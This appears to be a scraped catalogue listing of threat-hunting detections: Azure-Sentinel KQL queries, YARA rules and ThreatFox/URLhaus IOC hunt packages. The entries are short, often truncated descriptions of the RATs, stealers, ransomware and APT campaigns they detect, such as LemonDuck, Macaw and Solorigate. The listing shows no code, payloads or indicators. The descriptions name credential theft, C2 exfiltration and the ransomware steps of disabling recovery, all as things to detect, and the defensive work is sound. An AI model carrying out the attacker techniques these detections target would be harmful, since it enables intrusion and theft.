backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
T1095T1059.004T1070
DeviceProcessEvents

This query was originally published by PWC Security Research Team. BPFDoor is custom backdoor malware used by Red Menshen. The BPFDoor allows an adversary to backdoor a system and remotely execute cod

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEventsDeviceProcessEvents

This query was originally published in the threat analytics report, EvilQuest signals the rise of Mac ransomware. As of the time of this writing (October 2020), ransomware designed to target macOS is

huntingmicrosoftofficialransomware
robbinhood-driver
kql medium
Azure-Sentinel source
DeviceFileEvents

This query was originally published in the threat analytics report, Ransomware continues to hit healthcare, critical services. There is also a related blog. Robbinhood is ransomware that has been invo

backdoorevasionexploithuntingmicrosoftofficialransomware
robbinhood-evasion
kql medium
Azure-Sentinel source
DeviceProcessEvents

The hypothesis detects Robbin

backdoorevasionexploithuntingmicrosoftofficialransomware
sandrorat
yara low
Yara-Rules source

YARA rule: sandrorat

backdoorcommunitysandrorat
Azure-Sentinel source
T1098.001
AuditLogs

Hunting query that looks for credential additions or updates on service principals and applications performed by actors (users or apps) that have not been observed initiating the same operations in th

backdoorcredential-thefthuntingmicrosoftofficialpersistence
Azure-Sentinel source
EmailEventsEmailUrlInfo

Snip3 is a family of related remote access trojans. Although the malware in this family contain numerous small variations, they all exhibit similar behaviors and techniques. The following query looks

backdoorhuntingmicrosoftofficialpersistence
Azure-Sentinel source
DeviceEvents

Snip3 is a family of related remote access trojans. Although the malware in this family contain numerous small variations, they all exhibit similar behaviors and techniques. The following query looks

backdoorhuntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceFileEvents

Snip3 is a family of related remote access trojans. Although the malware in this family contain numerous small variations, they all exhibit similar behaviors and techniques. The following query looks

backdoorhuntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceNetworkEvents

Snip3 is a family of related remote access trojans. Although the malware in this family contain numerous small variations, they all exhibit similar behaviors and techniques. The following query looks

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

Snip3 is a family of related remote access trojans. Although the malware in this family contain numerous small variations, they all exhibit similar behaviors and techniques. The following query looks

backdoorhuntingmicrosoftofficial
ThreatFox: Evilginx IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Evilginx

elf-evilginxiocthreatfox
ThreatFox source
DnsEvents

ClearFake malware is a data exfiltration tool that establishes

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

KongTuke malware is a downloader that establishes command-and-control (C2) communication via the associated domains to exfiltrate data and deploy additional payloads. It typically arrives through phishing emails containing malicious

iocjs-kongtukethreatfox
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 10 IOCs associated with SmartApeSG

iocjs-smartapesgthreatfox
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 25 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
DnsEvents

The "Unknown Webinject" malware

iocthreatfoxunknown_webinject
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox source
CommonSecurityLogDeviceNetworkEventsUrlClickEvents

The Loki Password Stealer (PWS) is a credential-stealing malware that exfiltrates sensitive data such as passwords and browser credentials to command-and-control servers. It typically arrives via phishing emails containing malicious

infostealeriocthreatfoxwin-lokipws
ThreatFox source
UrlClickEvents

Lumma Stealer is a data-exfiltration malware that steals sensitive information such as credentials, cookies, and browser data by leveraging compromised systems. It typically arrives via phishing emails or

infostealeriocthreatfoxwin-lumma
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox source
DnsEvents

Hunt package for 3 IOCs associated with SnappyClient

iocthreatfoxwin-snappy_client
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

ValleyRAT is a remote access trojan designed for data exfiltration and command-and-control (C2) communication, leveraging encrypted channels to maintain persistence and execute arbitrary payloads. It typically arrives via phishing emails with malicious attachments or exploit kits

backdooriocthreatfoxwin-valley_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Vidar is a data exfiltration malware that steals credentials and sensitive information by leveraging compromised systems to exfiltrate data to command-and-control servers. It typically arrives via phishing emails containing malicious attachments or links to malicious domains and URLs. SOC analysts should monitor for unusual outbound network traffic, unexpected process executions, and signs of credential theft or lateral movement beyond the listed IOCs.

iocthreatfoxwin-vidar
tinhvan
yara low
Yara-Rules source

YARA rule: tinhvan

community
Tor
kql medium
Azure-Sentinel source
DeviceNetworkEvents

This query looks for the Tor client, or for a common Tor plugin called Meek. We query for active Tor connections, but could have alternatively looked for active Tor runs (ProcessCreateEvents) or Tor downl

huntingmicrosoftofficial
Yara-Rules source

From static analysis

community
Yara-Rules source

Searches for probable relationships between APKs

community
Yara-Rules source

From cromosome.py

community
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 27 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 62 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 7 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 7 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

The Mozi malware family is a backdoor that enables remote command execution and data exfiltration, often used for persistent access and espionage. It typically arrives via phishing emails containing malicious URLs or through compromised websites hosting malicious domains. SOC analysts should monitor

iocurlhaus
Yara-Rules source

Yara rule for detection of Fake AliPay Sms Stealer

communityinfostealer
Yara-Rules source

This rule tries to detect the Spy.Banker AVITO-MMS variant

community
Yara-Rules source

This rule tries to detect the Spy.Banker AVITO-MMS variant

community
androrat
yara low
Yara-Rules source

YARA rule: androrat

androratbackdoorcommunity
apt sofacy
kql medium
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_sofacy.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
apt sofacy zebrocy
kql medium
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_sofacy_zebrocy.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
apt ta17 293a ps
kql medium
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_ta17_293a_ps.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
apt tropictrooper
kql medium
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_tropictrooper.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_unidentified_nov_18.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_unidentified_nov_18.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
Yara-Rules source

This rule detects APKs from the ASSD developer

community
Azure-Sentinel source
DeviceEvents

This query was originally published in the threat analytics report, Solorigate supply chain attack. Please note that these attacks are currently known as the Nobelium campaign. Microsoft detects the 2

aptbackdoorhuntingmicrosoftofficial
Azure-Sentinel source
IdentityQueryEvents

This query was originally published in the threat analytics report, Solorigate supply chain attack. Please note that these attacks are currently known as the Nobelium campaign. Microsoft detects the 2

aptbackdoorhuntingmicrosoftofficial
Azure-Sentinel source
IdentityQueryEvents

This query was originally published in the threat analytics report, Solorigate supply chain attack. Please note that these attacks are currently known as the Nobelium campaign. Microsoft detects the 2

aptbackdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

This query was originally published in the threat analytics report, Solorigate supply chain attack. Please note that these attacks are currently known as the Nobelium campaign. Microsoft detects the 2

aptbackdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Ryuk ransomware. There is also a related blog. Ryuk is human-operated ransomware. Much like DoppelPaymer ransomware, Ryuk is spread

backdoorcobalt-strikehuntingmicrosoftofficialransomwarewmi
Azure-Sentinel source
DeviceFileEvents

Search for the files that are using a compromised certificate associated with the Nobelium campaign. You can remove the comments to: 1. get the list of devices where there is at least one file signed

huntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

Search for the files that are using a compromised certificate associated with the Lapsus$ group. You can remove the comments to: 1. get the list of devices where there is at least one file signed with

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Confluence and WebLogic abuse. 2019 has seen several seemingly related campaigns targeting Atlassian Confluence Server and Oracle We

exploithuntingmicrosoftofficial
coudw
yara low
Yara-Rules source

The YARA rule 'coudw' detects artifacts associated with the malware family 'coudw', likely targeting endpoints or networked systems. SOC teams should deploy this rule in endpoint EDR scanning, email gateway

communitycoudw
Yara-Rules source

Detects CVE-2018-4878

communityexploit
Yara-Rules source

CVE-2012-0158 variant

communityexploit
Yara-Rules source

Java Applet JMX Remote Code Execution

community
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Cypherpunk ransomware leaves wake of tampered AVs. Cypherpunk is a human-operated ransomware campaign named after the unusual .cyphe

backdoorhuntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Cypherpunk ransomware leaves wake of tampered AVs. Cypherpunk is a human-operated ransomware campaign named after the unusual .cyphe

backdoorhuntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceNetworkEvents

These queries were originally published in the threat analytics report, Attacks on gov't, think tanks, NGOs. As described further in Analysis of cyberattack on U.S. think tanks, non-profits, public sec

backdoorhuntingmicrosoftofficialphishing
Azure-Sentinel source
DeviceProcessEvents

These queries were originally published in the threat analytics report, Attacks on gov't, think tanks, NGOs. As described further in Analysis of cyberattack on U.S. think tanks, non-profits, public sec

backdoorhuntingmicrosoftofficialphishing
Azure-Sentinel source
DeviceEventsDeviceFileEventsDeviceImageLoadEventsDeviceNetworkEventsDeviceProcessEventsDeviceRegistryEvents

These queries were originally published in the threat analytics report, Attacks on gov't, think tanks, NGOs. As described further in Analysis of cyberattack on U.S. think tanks, non-profits, public sec

backdoorhuntingmicrosoftofficialphishing
Azure-Sentinel source
DeviceProcessEvents

These queries were originally published in the threat analytics report, Attacks on gov't, think tanks, NGOs. As described further in Analysis of cyberattack on U.S. think tanks, non-profits, public sec

backdoorhuntingmicrosoftofficialphishing
Azure-Sentinel source
DeviceEventsDeviceFileEventsDeviceImageLoadEventsDeviceNetworkEventsDeviceProcessEventsDeviceRegistryEvents

These queries were originally published in the threat analytics report, Attacks on gov't, think tanks, NGOs. As described further in Analysis of cyberattack on U.S. think tanks, non-profits, public sec

backdoorhuntingmicrosoftofficialphishing
droidian
yara low
Yara-Rules source

YARA rule: droidian

communitydroidian
Yara-Rules source

Look for known Elliptic curve orders

community
Azure-Sentinel source

Search for the CVEs that should be prioritized and resolved to reduce the success of the FireEye Red Team tools compromised by the Nobelium activity group. See red_team_tool_countermeasures on the off

huntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEventsDeviceImageLoadEvents

This query searches for the HASHs of the FireEye Red Team tools compromised by the Nobelium activity group. See all-hashes.csv on the official FireEye repo. References: https://github.com/fireeye/red_

huntingmicrosoftofficial
FlashNewfunction
yara low
Yara-Rules source

YARA rule: FlashNewfunction

community
gtalocker
yara low
Yara-Rules source

YARA rule: gtalocker

communitygtalocker
infostealer
yara low
Yara-Rules source

YARA rule: infostealer

communityinfostealer
jagonca
yara low
Yara-Rules source

YARA rule: jagonca

communityjagonca
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Sysrv botnet evolution. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptoc

huntingmicrosoftofficialpowershell
Yara-Rules source

YARA rule: JavaDeploymentToolkit

community
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Sysrv botnet evolution. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptoc

huntingmicrosoftofficial
Azure-Sentinel source

This query was originally published in the threat analytics report, Solorigate supply chain attack. Please note that these attacks are currently known as the Nobelium campaign. Microsoft detects the 2

aptbackdoorexploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Solorigate supply chain attack. Please note that these attacks are currently known as the Nobelium campaign. Microsoft detects the 2

aptbackdoorhuntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Solorigate supply chain attack. Please note that these attacks are currently known as the Nobelium campaign. Microsoft detects the 2

aptbackdoorhuntingmicrosoftofficial
lenovo reaper
yara low
Yara-Rules source

YARA rule: lenovo_reaper

communitylenovo_reaper
Azure-Sentinel source
DeviceFileEvents

This query was originally published in the threat analytics report, Solorigate supply chain attack. Please note that these attacks are currently known as the Nobelium campaign. Microsoft detects the 2

aptbackdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceImageLoadEvents

This query was originally published in the threat analytics report, Solorigate supply chain attack. Please note that these attacks are currently known as the Nobelium campaign. Microsoft detects the 2

aptbackdoorhuntingmicrosoftofficial
Malicious bat file
kql medium
Azure-Sentinel source
DeviceFileEvents

ZLoader was delivered in a campaign in late summer 2021. This campaign was tweeted about by @MsftSecIntel on Twitter.

huntingmicrosoftofficial
marcher
yara low
Yara-Rules source

YARA rule: marcher

communitymarcher
Yara-Rules source

YARA rule: MSIETabularActivex

community
Azure-Sentinel source
DeviceFileEventsDeviceProcessEvents

This query was originally published in the threat analytics report, Sysrv botnet evolution. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptoc

exploithuntingmicrosoftofficialpowershell
Payload Delivery
kql medium
Azure-Sentinel source
DeviceNetworkEvents

ZLoader was delivered in a campaign in summer 2021 via malvertising. This campaign was tweeted about by @MsftSecIntel on Twitter.

huntingmicrosoftofficial
pornlocker
yara low
Yara-Rules source

YARA rule: pornlocker

communitypornlocker
Yara-Rules source

YARA rule: potential_CVE_2017_11882

community
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Sysrv botnet evolution. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptoc

huntingmicrosoftofficial
Yara-Rules source

Attempts to identify the exploit CVE-2017-11882

communityexploit
Yara-Rules source

Attempts to identify the exploit CVE-2017-11882

communityexploit
Yara-Rules source

SHA-3 (Keccak) round constants

community
Yara-Rules source

SHA-3 (Keccak) interleaved round constants

community
Yara-Rules source

Look for SipHash constants in big endian

community
slocker
yara low
Yara-Rules source

YARA rule: slocker

communityslocker
Azure-Sentinel source
DeviceRegistryEvents

ZLoader was delivered in a campaign in late summer 2021 using malvertising to download malicious .msi files onto affected machines. This campaign was originally tweeted by @MsftSecIntel on Twitter. In

huntingmicrosoftofficial
thoughtcrime
yara low
Yara-Rules source

YARA rule: thoughtcrime

communitythoughtcrime
Azure-Sentinel source
EmailEvents

Identify prior activity from this campaign using IOCs shared by Microsoft's Threat Intelligence Center, or MSTIC. Read more: https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphoru

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
EmailEvents

Identify prior activity from this campaign using IOCs shared by Microsoft's Threat Intelligence Center, or MSTIC. Read more: https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphoru

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
EmailEvents

Identify prior activity from this campaign using IOCs shared by Microsoft's Threat Intelligence Center, or MSTIC. Read more: https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphoru

backdoorhuntingmicrosoftofficial
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Kimwolf

apk-kimwolfiocthreatfox
ThreatFox source
DnsEvents

ClearFake malware is designed to ex

iocjs-clearfakethreatfox
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 2 IOCs associated with IClickFix

iocjs-iclickfixthreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 2 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 5 IOCs associated with SmartApeSG

iocjs-smartapesgthreatfox
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 34 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 7 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEventsUrlClickEvents

Hunt package for 3 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with DCRat

backdooriocthreatfoxwin-dcrat
ThreatFox source
DnsEvents

Hunt package for 16 IOCs associated with Lumma Stealer

infostealeriocthreatfoxwin-lumma
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Meterpreter

iocthreatfoxwin-meterpreter
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 22 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox: NjRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with NjRAT

backdooriocthreatfoxwin-njrat
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 5 IOCs associated with Phantom Stealer

infostealeriocthreatfoxwin-phantom_stealer
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Quasar

backdooriocthreatfoxwin-quasar_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 5 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox: Remus IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 12 IOCs associated with Remus

iocthreatfoxwin-remus
ThreatFox source
CommonSecurityLogDeviceNetworkEventsUrlClickEvents

SectopRAT is a remote access trojan that enables attackers to exfiltrate data, execute arbitrary commands, and maintain

backdooriocthreatfoxwin-sectop_rat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with ValleyRAT

backdooriocthreatfoxwin-valley_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Vidar is a credential-stealing malware that exfiltrates sensitive data via encrypted channels and establishes persistence through scheduled tasks or registry entries. It typically arrives via phishing

iocthreatfoxwin-vidar
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Sysrv botnet evolution. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptoc

exploithuntingmicrosoftofficialpowershell
unknown 1
yara low
Yara-Rules source

The YARA rule 'unknown_1' detects potential unknown malware family artifacts, likely indicating suspicious files or behaviors. SOC teams should deploy this rule in endpoint EDR scanning, email gateway, and file share monitoring to identify and contain threats early.

communityunknown
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 28 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 4 malicious URLs tagged as BillGates

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 49 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 4 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as Mozi

iocurlhaus
Azure-Sentinel source
DeviceProcessEvents

This query identifies the launch pattern associated with wastedlocker ransomware. Reference writeup: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us

huntingmicrosoftofficialransomware
z3core
yara low
Yara-Rules source

YARA rule: z3core

communityz3core
Azure-Sentinel source

Microsoft has observed attackers exploiting vulnerabilities associated with Log4J.

exploithuntingmicrosoftofficial
app-armor-stopped
kql medium
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Sysrv botnet evolution. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptoc

huntingmicrosoftofficial
Aria SBox 2
yara low
Yara-Rules source

Aria SBox 2

community
Yara-Rules source

Look for Base64 table

community
BigDig bpInit
yara low
Yara-Rules source

BigDig bpInit

community
BigDig mpModExp
yara low
Yara-Rules source

BigDig mpModExp

community
BigDig mpModInv
yara low
Yara-Rules source

BigDig mpModInv

community
BigDig mpModMult
yara low
Yara-Rules source

BigDig mpModMult

community
BigDig mpModulo
yara low
Yara-Rules source

BigDig mpModulo

community
BigDig spModExpB
yara low
Yara-Rules source

BigDig spModExpB

community
BigDig spModInv
yara low
Yara-Rules source

BigDig spModInv

community
BigDig spModMult
yara low
Yara-Rules source

BigDig spModMult

community
Yara-Rules source

Look for 128-bit key Chacha stream cipher constant

community
Yara-Rules source

Look for 256-bit key Chacha stream cipher constant

community
Yara-Rules source

CryptoPP ApplyFunction

community
Yara-Rules source

CryptoPP Integer constructor

community
Yara-Rules source

CryptoPP RsaFunction

community
Yara-Rules source

Look for DCP Blowfish EncryptCBC

community
Yara-Rules source

Look for DCP Blowfish Init

community
Yara-Rules source

Look for DCP Des EncryptECB

community
Yara-Rules source

Look for DCP Des Init

community
Yara-Rules source

Look for DCP RijnDael EncryptECB

community
Yara-Rules source

Look for DCP RijnDael Init

community
Azure-Sentinel source
DeviceEvents

Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization

backdoorhuntingmicrosoftofficial
Yara-Rules source

Look for Compare string function

community
Yara-Rules source

Look for Copy function

community
Yara-Rules source

Look for DecodeDate (DecodeDateFully) function

community
Yara-Rules source

Look for Form.Show function

community
Yara-Rules source

Look for IntToStr function

community
Yara-Rules source

Look for Random function

community
Yara-Rules source

Look for RandomRange function

community
Yara-Rules source

Look for StrToInt function

community
Azure-Sentinel source
AlertEvidence

Microsoft has observed threat actors exploiting vulnerabilities associated with Log4J.

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Prior to deploying Macaw ransomware in an organization, the adversary will disable all controlled folders, which will enable them to be encrypted once the ransomware payload is deployed.

huntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

Dopplepaymer In-Memory Malware Implant. This query identifies processes whose command-line launch strings match the pattern used in Dopplepaymer ransomware attacks.

huntingmicrosoftofficialransomware
Dragon Fly
kql medium
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_dragonfly.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
Elise backdoor
kql medium
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_elise.yml. Questions via Twitter: @janvonkirchheim.

aptbackdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_equationgroup_c2.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization

backdoorhuntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceProcessEvents

This query searches for a string pattern detected in evasive PowerShell usage. Jupyter or SolarMarker will iterate on this pattern multiple times to read data and call additional processes. This query

backdoorhuntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceProcessEvents

Use this query to find Excel launching anomalous processes congruent with Qakbot payloads which contain additional markers from recent Qakbot executions. The presence of such anomalous processes indic

huntingmicrosoftofficial
FGint RsaSign
yara low
Yara-Rules source

FGint RsaSign

community
Azure-Sentinel source
DeviceFileEvents

Use this query to find attempts to access files in the local path containing Outlook emails.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_hurricane_panda.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

The following query can locate activity possibly associated with the EUROPIUM threat actor.

huntingmicrosoftofficial
Azure-Sentinel source
AlertEvidence

This query looks for Microsoft Defender Antivirus detections related to EUROPIUM actor

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query looks for identity additions made through Exchange PowerShell

huntingmicrosoftofficialpowershell
Imminent Ransomware
kql medium
Azure-Sentinel source
DeviceProcessEvents

Directly prior to deploying Macaw ransomware in an organization, the attacker will run several commands designed to disable security tools and system recovery tools.

huntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

Prior to deploying Macaw ransomware in an organization, the adversary will disable several tools and functions in order to inhibit later recovery efforts.

huntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_judgement_panda_gtr19.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
Azure-Sentinel source
AlertEvidence

This query looks for Microsoft Defender Antivirus detections with the family names used by KNOTWEED

huntingmicrosoftofficial
Azure-Sentinel source
DeviceRegistryEvents

This query identifies modifications to COM registry keys to point to executable files in C:\Windows\System32\spool\drivers\color\

huntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

This query identifies matches based on domain IOCs related to KNOTWEED against Microsoft Defender for Endpoint device network connections

huntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

This query looks for new files being downloaded using Curl.

huntingmicrosoftofficial
Azure-Sentinel source

This query identifies matches based on KNOTWEED file hash IOCs across Microsoft Defender for Endpoint tables

huntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

This query identifies modifications to COM registry keys to point to executable files in C:\Windows\System32\spool\drivers\color\

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
EmailEvents

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi

backdoorcredential-thefthuntingmicrosoftofficial
Yara-Rules source

LockBox DecryptRsaEx

community
Yara-Rules source

LockBox EncryptRsaEx

community
Yara-Rules source

LockBox RsaEncryptFile

community
Yara-Rules source

LockBox TlbRsaKey

community
Azure-Sentinel source
DeviceProcessEvents

Backdoor processes associated with OceanLotus Mac malware backdoor. References: https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/. OS platform

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Backdoor processes associated with OceanLotus Mac malware backdoor dropper. References: https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/. OS

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Prior to deploying Macaw ransomware in an organization, adversaries will change the password for hundreds or thousands of accounts in order to lock users out of the network and impede recovery effort

huntingmicrosoftofficialransomware
Yara-Rules source

Miracl Big constructor

community
Yara-Rules source

